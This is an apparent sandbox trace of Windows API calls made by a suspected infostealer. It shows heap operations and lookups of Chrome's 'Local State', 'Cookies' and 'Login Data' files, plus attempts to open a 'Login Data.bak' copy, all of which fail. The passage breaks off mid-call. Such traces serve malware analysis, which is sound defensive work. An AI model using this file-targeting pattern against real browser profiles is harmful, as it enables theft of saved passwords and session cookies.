GetProcessHeap () returned 0x5f0000 [0180.048] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x53) returned 0x618290 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.048] GetProcessHeap () returned 0x5f0000 [0180.048] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c550 | out: hHeap=0x5f0000) returned 1 [0180.049] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.049] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\..\\Local State") returned 0 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618290 | out: hHeap=0x5f0000) returned 1 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f160 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.049] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.049] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.049] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.049] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613440 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613aa0 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613aa0, Size=0x89) returned 0x61c280 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x620550 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0x97) returned 0x611f60 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.049] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4c) returned 0x620550 [0180.049] GetProcessHeap () returned 0x5f0000 [0180.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.050] GetProcessHeap () returned 0x5f0000 [0180.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c280 | out: hHeap=0x5f0000) returned 1 [0180.050] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.050] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 0 [0180.050] GetProcessHeap () returned 0x5f0000 [0180.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.050] GetProcessHeap () returned 0x5f0000 [0180.050] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620550 | out: hHeap=0x5f0000) returned 1 [0180.050] GetProcessHeap () returned 0x5f0000 [0180.050] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x6247e0 [0180.050] GetProcessHeap () returned 0x5f0000 [0180.050] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0d0 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x624900 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d20 [0180.053] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x5f0000) returned 1 [0180.053] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x624900, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.053] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f0e0 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x89) returned 0x61ca60 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x45) returned 0x6209b0 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6209b0, Size=0x9d) returned 0x611f60 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4f) returned 0x6206e0 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.053] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6206e0, Size=0xa5) returned 0x624a20 [0180.053] GetProcessHeap () returned 0x5f0000 [0180.054] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.054] GetProcessHeap () returned 0x5f0000 [0180.054] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61ca60 | out: hHeap=0x5f0000) returned 1 [0180.054] GetProcessHeap () returned 0x5f0000 [0180.054] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f0e0 | out: hHeap=0x5f0000) returned 1 [0180.054] GetProcessHeap () returned 0x5f0000 [0180.054] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615ea0 [0180.054] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.054] GetProcessHeap () returned 0x5f0000 [0180.054] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x624a20, cbMultiByte=82, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0180.054] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysAllocStringLen") returned 0x7ffb288fe5b0 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f0e0 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615f60 [0180.055] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x624a20, cbMultiByte=82, lpWideCharStr=0x624c98, cchWideChar=82 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak") returned 82 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615dc0 [0180.055] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f110 [0180.055] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f1b0 [0180.055] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0180.055] GetProcessHeap () returned 0x5f0000 [0180.055] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f1b0 | out: hHeap=0x5f0000) returned 1 [0180.055] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f0e0, Size=0x53) returned 0x618950 [0180.056] GetProcessHeap () returned 0x5f0000 [0180.056] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615d60 [0180.056] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.056] GetProcessHeap () returned 0x5f0000 [0180.056] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", cchWideChar=82, lpMultiByteStr=0x618950, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 82 [0180.056] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysFreeString") returned 0x7ffb28900ae0 [0180.056] GetProcessHeap () returned 0x5f0000 [0180.056] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x53) returned 0x618470 [0180.056] GetProcessHeap () returned 0x5f0000 [0180.056] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618950 | out: hHeap=0x5f0000) returned 1 [0180.059] GetProcessHeap () returned 0x5f0000 [0180.059] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618470 | out: hHeap=0x5f0000) returned 1 [0180.064] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.065] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.090] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x61f110 [0180.090] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61f110) returned 0x10 [0180.090] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61f110) returned 0x10 [0180.090] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f110 | out: hHeap=0x5f0000) returned 1 [0180.091] GetSystemInfo (in: lpSystemInfo=0x1800b8280 | out: lpSystemInfo=0x1800b8280*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0180.091] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.091] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.091] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2a0) returned 0x624d50 [0180.091] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x624d50) returned 0x2a0 [0180.092] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613320 [0180.092] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613320) returned 0x30 [0180.092] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x611f60 [0180.092] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611f60) returned 0x80 [0180.094] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615f60 [0180.095] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615f60) returned 0x20 [0180.095] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x625000 [0180.095] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625000) returned 0x80 [0180.095] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615d60 [0180.095] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615d60) returned 0x20 [0180.095] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x80) returned 0x625090 [0180.095] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625090) returned 0x80 [0180.095] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x615ca0 [0180.095] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x615ca0) returned 0x20 [0180.095] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x58) returned 0x618590 [0180.095] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618590) returned 0x58 [0180.098] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x48) returned 0x6209b0 [0180.098] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6209b0) returned 0x48 [0180.098] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x88) returned 0x61cf70 [0180.098] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61cf70) returned 0x88 [0180.103] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x828) returned 0x625120 [0180.103] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0x828 [0180.106] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618590, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0180.106] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa8) returned 0x625960 [0180.106] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0xa8 [0180.106] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x618590, cbMultiByte=-1, lpWideCharStr=0x625960, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak") returned 83 [0180.106] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0180.106] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb0) returned 0x625a20 [0180.106] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625a20) returned 0xb0 [0180.106] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", nBufferLength=0x56, lpBuffer=0x625a20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", lpFilePart=0x0) returned 0x52 [0180.107] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0xa8 [0180.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625960 | out: hHeap=0x5f0000) returned 1 [0180.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0180.107] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x58) returned 0x618890 [0180.107] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618890) returned 0x58 [0180.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x618890, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 83 [0180.107] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625a20) returned 0xb0 [0180.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625a20 | out: hHeap=0x5f0000) returned 1 [0180.110] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618890) returned 0x58 [0180.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618890 | out: hHeap=0x5f0000) returned 1 [0180.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3b8) returned 0x625960 [0180.110] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0x3b8 [0180.110] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0x828 [0180.110] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625120 | out: hHeap=0x5f0000) returned 1 [0180.110] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0180.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa8) returned 0x625120 [0180.110] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.110] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x625120, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak") returned 83 [0180.111] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.111] GetLastError () returned 0x3 [0180.111] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.111] GetLastError () returned 0x3 [0180.111] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="訐a") returned 0x2c [0180.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.115] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.115] LocalFree (hMem=0x618a10) returned 0x0 [0180.115] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.115] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.115] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.115] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625120 | out: hHeap=0x5f0000) returned 1 [0180.115] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0180.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa8) returned 0x625120 [0180.115] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.115] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x625c10, cbMultiByte=-1, lpWideCharStr=0x625120, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak") returned 83 [0180.115] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x5cef70 | out: lpFileInformation=0x5cef70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0180.115] GetLastError () returned 0x3 [0180.115] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0180.115] GetLastError () returned 0x3 [0180.115] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x3, dwLanguageId=0x0, lpBuffer=0x5ced78, nSize=0x0, Arguments=0x0 | out: lpBuffer="襐a") returned 0x2c [0180.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.115] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613440 [0180.115] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The system cannot find the path specified.\r\n", cchWideChar=-1, lpMultiByteStr=0x613440, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system cannot find the path specified.\r\n", lpUsedDefaultChar=0x0) returned 45 [0180.116] LocalFree (hMem=0x618950) returned 0x0 [0180.116] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x613440) returned 0x30 [0180.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.116] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625120) returned 0xa8 [0180.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625120 | out: hHeap=0x5f0000) returned 1 [0180.116] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x625960) returned 0x3b8 [0180.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625960 | out: hHeap=0x5f0000) returned 1 [0180.116] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x61cf70) returned 0x88 [0180.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61cf70 | out: hHeap=0x5f0000) returned 1 [0180.116] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6209b0) returned 0x48 [0180.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6209b0 | out: hHeap=0x5f0000) returned 1 [0180.116] GetLastError () returned 0x3 [0180.116] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x618590) returned 0x58 [0180.116] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618590 | out: hHeap=0x5f0000) returned 1 [0180.116] GetProcessHeap () returned 0x5f0000 [0180.116] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613440 [0180.116] GetProcessHeap () returned 0x5f0000 [0180.116] RtlAllocateHeap (HeapHandle=0x5f0000, 